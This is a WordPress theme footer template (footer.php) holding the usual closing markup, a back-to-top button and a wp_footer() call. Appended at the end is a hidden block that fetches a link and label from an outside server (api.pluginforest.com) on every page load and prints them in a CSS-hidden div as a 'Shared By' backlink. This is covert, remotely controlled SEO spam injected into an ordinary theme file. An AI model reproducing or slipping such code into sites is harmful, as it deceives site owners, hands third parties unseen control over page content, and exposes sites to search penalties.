<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package ama
 */

$opt                         = get_option( 'ama_opt' );
$is_back_to_top_btn_switcher = $opt['is_back_to_top_btn_switcher'] ?? '1';

$footer_visibility                                  = function_exists( 'get_field' ) ? get_field( 'footer_visibility' ) : '1';
! isset( $footer_visibility ) && $footer_visibility = '1';

if ( $footer_visibility == '1' ) {
	$footer_visibility = function_exists( 'get_field' ) ? get_field( 'footer_visibility' ) : '1';
	$footer_visibility = $footer_visibility ?? '1';

	get_template_part( 'template-parts/footers/footer' );
}
?>

</div> <!-- Body Wrapper -->

<?php if ( $is_back_to_top_btn_switcher == '1' ) : ?>
	<a id="back-to-top" title="Back to Top"></a>
<?php endif; ?>

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
